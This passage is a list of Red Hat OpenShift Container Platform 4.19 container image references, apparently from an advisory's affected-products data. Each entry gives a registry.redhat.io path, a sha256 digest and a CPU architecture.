"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
